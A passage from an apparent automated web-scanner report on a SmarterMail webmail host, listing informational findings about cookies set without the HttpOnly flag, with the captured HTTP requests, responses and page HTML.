ZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BSYXdDb250ZW50AfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lECgtkBRtjdGwwMCROYXZQSCR0YWJWaWV3JHRhYkh0bWwPMsQLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAVASHRtbAH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAoLZAUjY3RsMDAkVFBIJHRhYlNlY3Rpb24kdGFiQXR0YWNobWVudHMPMssLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAxAQXR0YWNobWVudHMB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQKC2QPo5kUYqhj0pC+tCZv8taFBsEzig==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls(['tctl00$UpdatePanel2','tctl00$TPH$UpdatePanel1','tctl00$UpdatePanel1','tctl00$NavPH$UpdatePanel4','tctl00$CntPH$UpdatePanel3','tctl00$MPH$UpdatePanel2'], ['ctl00$MPH$MessageContents'], [], 90);
//]]>
</script>

       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   
   <div id="ctl00_BPH_btnReply" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('\x2fMain\x2ffrmCompose\x2easpx\x3faction\x3dreply\x26folder\x3dInbox\x26uid\x3d4294967295\x26user\x3deuser\x26mapped\x3dFalse\x26fromPreview\x3dtrue\x26rowNumber\x3d0', 800, 600); return false;"><span class="BBInner">Reply</span></a></div>
   <div id="ctl00_BPH_btnReplyAll" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('\x2fMain\x2ffrmCompose\x2easpx\x3faction\x3dreplytoall\x26folder\x3dInbox\x26uid\x3d4294967295\x26user\x3deuser\x26mapped\x3dFalse\x26fromPreview\x3dtrue\x26rowNumber\x3d0', 800, 600); return false;"><span class="BBInner">Reply All</span></a></div>
   <div id="ctl00_BPH_btnForward" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="OpenNewMessage('\x2fMain\x2ffrmCompose\x2easpx\x3faction\x3dforward\x26folder\x3dInbox\x26uid\x3d4294967295\x26user\x3deuser\x26mapped\x3dFalse\x26fromPreview\x3dtrue\x26rowNumber\x3d0', 800, 600); return false;"><span class="BBInner">Forward</span></a></div>
   <div id="ctl00_BPH_btnDelete" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnDelete',''); return false;"><span class="BBInner">Delete</span></a></div>
   
   
   
   <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintWindow();; return false;"><span class="BBInner">Print</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
   

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       <div id="ctl00_UpdatePanel2">
   
               <div id="ctl00_Header" class="PreviewHeader">
               <div class='PreviewPrimary'>[No Subject]</div><div class='PreviewInfo'></div></div>
           
</div>
       <div id="ctl00_TabStrip" class="TabStripContainer">
           
   <div id="ctl00_TPH_UpdatePanel1">
   
           <div class="htsMessageTabsContainer">
               
<!-- HyperTabStrip -->
   <div class='htsTabStrip htsMessageTabs'><ul id='ctl00_TPH_tabSection'>
       <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_tabSection_tabMessage'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Message</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$TPH$tabSection$SelectedTab" id="ctl00_TPH_tabSection_SelectedTab" value="ctl00_TPH_tabSection_tabMessage" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   
           </div>
       
</div>

       </div>
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_Footer" class="Footer" style="width: 100%; position: absolute; display: none">
           <div class="FooterNav">
               
   <div id="ctl00_NavPH_UpdatePanel4">
   
           
<!-- HyperTabStrip -->
   <div class='htsTabStrip htsViewTabs htsOffset'><ul id='ctl00_NavPH_tabView'>
       <li class='htsItem htsFirst' id='ctl00_NavPH_tabView_tabRaw'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Raw Content</span></span></a></li>
       <li class='htsItem ' id='ctl00_NavPH_tabView_tabHeaders'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Header</span></span></a></li>
       <li class='htsItem ' id='ctl00_NavPH_tabView_tabText'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Text</span></span></a></li>
       <li class='htsItem htsLast htsSelected' id='ctl00_NavPH_tabView_tabHtml'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>HTML</span></span></a></li>
   </ul>
   <input type="hidden" name="ctl00$NavPH$tabView$SelectedTab" id="ctl00_NavPH_tabView_SelectedTab" value="ctl00_NavPH_tabView_tabHtml" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>
   
       
</div>

           </div>
           <div class="FooterSummary">
               
   <div id="ctl00_CntPH_UpdatePanel3">
   
           <span id="ctl00_CntPH_txtCounter"></span>
       
</div>

           </div>
       </div>
       

   <script type='text/javascript'>
       function CloseMessageWindow()
       {
           if (window.opener && window.opener.Invalidate)
               window.opener.Invalidate(true);
           setTimeout(function() { window.close(); }, 100);
       }
       document.AdditionalResizeEvent = function()
       {
           var html = $('#htmlViewFrame');
           var height = $('#Scrollable').innerHeight();
           html.height(height);
       }
       function createHtmlView(htmlText)
       {
           setTimeout(function() {
               var html = $("<iframe id='htmlViewFrame' frameborder='0' scrolling='auto' style='width: 100%; border: none'></iframe>");
               var scroll = $('#Scrollable');
               html.appendTo(scroll);
               var up = $('#ctl00_MPH_UpdatePanel2');
               $('<div></div>').appendTo(up)[0].dispose = function() { html.remove(); up.parent().show(); };
               up.parent().hide();
               var doc = html.contents()[0];
               doc.open();
               doc.write(htmlText);
               doc.close();
               html.contents().find("body").css("margin", "15px");
               $('#htmlEmailContainer').remove();
               document.AdditionalResizeEvent();
           }, 10);
       }
function UpdateView(mode) {
__doPostBack('ctl00$MPH$MessageContents', 'view=' + mode);
}
function RefreshFromPostback() {
__doPostBack('ctl00$MPH$MessageContents', '');
}
function ShowMoreAddresses(type)
{
           SpawnHyperWindow('/Main/frmMessageAddresses.aspx?&type=' + type, 600, 400);
}
document.RefreshFromPostback = RefreshFromPostback;
SetupAddressTooltips();
$(document).keydown(function(e) {
           var $s = $('#Scrollable');
           switch (e.which)
           {
               case 46: __doPostBack('ctl00$BPH$btnDelete',''); e.preventDefault(); break;
               case 40: $s.scrollTop($s.scrollTop() + 30); e.preventDefault(); break;
               case 38: $s.scrollTop($s.scrollTop() - 30); e.preventDefault(); break;
           }
});

   </script>


       <div id="Scrollable" class="PreviewContent">
           <div class="PreviewContentInner">
               
   <div id="ctl00_MPH_UpdatePanel2">
   
           This message no longer exists on this server.
   
           
           
           
       
</div>

           </div>
       </div>

       <script type="text/javascript">
           var $scrollable = $('#Scrollable');
           var $footer = $('#ctl00_Footer');
           document.ResizeEvent = function() {
               $scrollable.ResizeToFit();
               var top = $footer.parent().innerHeight() - $footer.outerHeight();
               $footer.css('top', top);
           }
           $(function() {
               $('#ctl00_Footer').show(); RegisterResizeEvent();
           });
       </script>

   

<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
ChangeFolderList('fl-1140420008','Inbox');
UpdateSidebarCounts('UserRSS', 0);
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
$(function() { $('#ctl00_TPH_tabSection').hyperTabStrip({"MultiPageClientID":null,"FunctionMap":{"ctl00_TPH_tabSection_tabMessage":"UpdateView(\u0027html\u0027);","ctl00_TPH_tabSection_tabAttachments":"UpdateView(\u0027attachments\u0027);","ctl00_TPH_tabSection_tabTasks":"UpdateView(\u0027tasks\u0027);"},"PageViewMap":{},"ClientCallbacks":{}}); });
$(function() { $('#ctl00_NavPH_tabView').hyperTabStrip({"MultiPageClientID":null,"FunctionMap":{"ctl00_NavPH_tabView_tabRaw":"UpdateView(\u0027raw\u0027);","ctl00_NavPH_tabView_tabHeaders":"UpdateView(\u0027header\u0027);","ctl00_NavPH_tabView_tabText":"UpdateView(\u0027plain\u0027);","ctl00_NavPH_tabView_tabHtml":"UpdateView(\u0027html\u0027);"},"PageViewMap":{},"ClientCallbacks":{}}); });
//]]>
</script>
</form>
</body>
</html>


6.4. http://vulnerable.smartermail.site:9998/UserControls/Popups/frmAddFileStorageFolder.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /UserControls/Popups/frmAddFileStorageFolder.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /UserControls/Popups/frmAddFileStorageFolder.aspx HTTP/1.1
Host: vulnerable.smartermail.site:9998
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; STHashCookie={"CountsGuid":"878548840","TopBarSection":"UserStorage"}; ASP.NET_SessionId=dbg5avn0mzbrp22rculzvx55; SM5Skin=Default;

Response

HTTP/2.0 302 Found
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 01:57:41 GMT
X-AspNet-Version: 2.0.50727
Location: /frmError.aspx?aspxerrorpath=/UserControls/Popups/frmAddFileStorageFolder.aspx
Set-Cookie: SM5Skin=Default; expires=Sat, 03-Oct-2020 01:57:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: Close

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ffrmError.aspx%3faspxerrorpath%3d%2fUserControls%2fPopups%2ffrmAddFileStorageFolder.aspx">here</a>.</h2>
</body></html>

6.5. http://vulnerable.smartermail.site:9998/frmError.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smartermail.site:9998
Path:   /frmError.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /frmError.aspx?aspxerrorpath=/Default.aspx HTTP/1.1
Host: vulnerable.smartermail.site:9998
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: STTTState=; STHashCookie={"CountsGuid":"226145125","TopBarSection":"UserContacts","RootLPSize":300}; SelectedLanguage=; settings=NqrSEiEtkzXQzORdp%2bg33xCkJy7Yi2at5xmX%2be4AJ2U%3d; SM5Skin=Default

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 00:30:42 GMT
X-AspNet-Version: 2.0.50727
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=2wiepq55pstf3w45cncaynbp; path=/; HttpOnly
Set-Cookie: SM5Skin=Default; expires=Sat, 03-Oct-2020 00:30:42 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 6321



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" class="Error">
<head id="ctl00_Head1"><title>
   Message - hoytllc.com - SmarterMail
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Error/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="Error" dir="ltr">
<form method="post" action="frmError.aspx?aspxerrorpath=%2fDefault.aspx" id="aspnetForm" class="Error">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJMTE0MTI3MTY2DxYGHghfX19UaXRsZQUHTWVzc2FnZR4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWAgIFD2QWBAIDDw8WAh4EVGV4dAUSJiN4MkY7RGVmYXVsdC5hc3B4ZGQCBw8PFgIfAwXQATxwPlRoZSBwYWdlIG9yIHJlc291cmNlIHRoYXQgeW91IGFyZSBhY2Nlc3NpbmcgaXMgdW5hdmFpbGFibGUgb3IgYW4gZXJyb3IgaGFzIG9jY3VycmVkLjwvcD4NCg0KPHA+VGhpcyBlcnJvciBvY2N1cnJlZCBhdCAxMC8yLzIwMTAgNzozMDo0MiBQTSBhbmQgaGFzIGJlZW4gbG9nZ2VkLiBQbGVhc2UgY29udGFjdCB5b3VyIHN5c3RlbSBhZG1pbmlzdHJhdG9yLjwvcD5kZGQSAvG5WjsFljvsfEyCMuljwMgY9g==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&amp;t=633802452069218315" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYAD0iIeAHZBtPh1mybNd0fzbzD1H1EGEbNX_3WW4l9J01&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=PkU8JqZ1AqOnNUfS9wB-O8XFAfH3kdpAehi09BJok9KiMBXqeEWZLvdsdUFLbPxYxlutgliktFrtyUOE-2vtH5p7RzBBFeKiwavJVGKo3xk1&amp;t=ffffffffec2d9970" type="text/javascript"></script>
<script type="text/javascript">
if (parent.isRoot != null)
parent.location.href = location.href;
</script>
<script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', document.getElementById('aspnetForm'));
Sys.WebForms.PageRequestManager.getInstance()._updateControls([], [], [], 90);
//]]>
</script>

<div class="CenteredError">
<div class="ShadowBox">
<div class="ErrorBox">
<div class="ErrorTitle">
<div class="RoundedPageTitleLeft">
<div class="RoundedPageTitleRight">
<div class="ErrorTitleText">
An Error Occurred
</div>
</div>
</div>
</div>
<div class="RoundedBottom">
<div class="RoundedLeft">
<div class="RoundedRight">
<div class="RoundedBottomLeft">
<div class="RoundedBottomRight">
<div class="ErrorSpacer">
</div>
<div class="ErrorContent">

   <div class="ErrorSetting">
       <div class="ErrorLabel">
           Page:
       </div>
       <span id="ctl00_MPH_lblPageName">&#x2F;Default.aspx</span>
   </div>
   <div class="ErrorSetting">
       <div class="ErrorLabel">
           Message
       </div>
       <span id="ctl00_MPH_lblError"><p>The page or resource that you are accessing is unavailable or an error has occurred.</p>

<p>This error occurred at 10/2/2010 7:30:42 PM and has been logged. Please contact your system administrator.</p></span>
   </div>

</div>
<div class="ErrorButtons">
<div class="ErrorButtonsLeft">

</div>

   <div id="ctl00_BrPH_BackIcon" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BrPH$BackIcon',''); return false;"><span class="BBInner">Back</span></a></div>

</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB60CF5B830100_1.6.3925.24513_&fileMask="></script>



<script type="text/javascript">
//<![CDATA[
UpdateSidebarCounts('UserEmail', 0);
ChangeFolderList('fl-1140420008','Inbox');
UpdateSidebarCounts('UserRSS', 0);
UpdateSidebarCounts('UserSync', 0);
Sys.Application.initialize();
//]]>
</script>
</form>
</body>
</html>

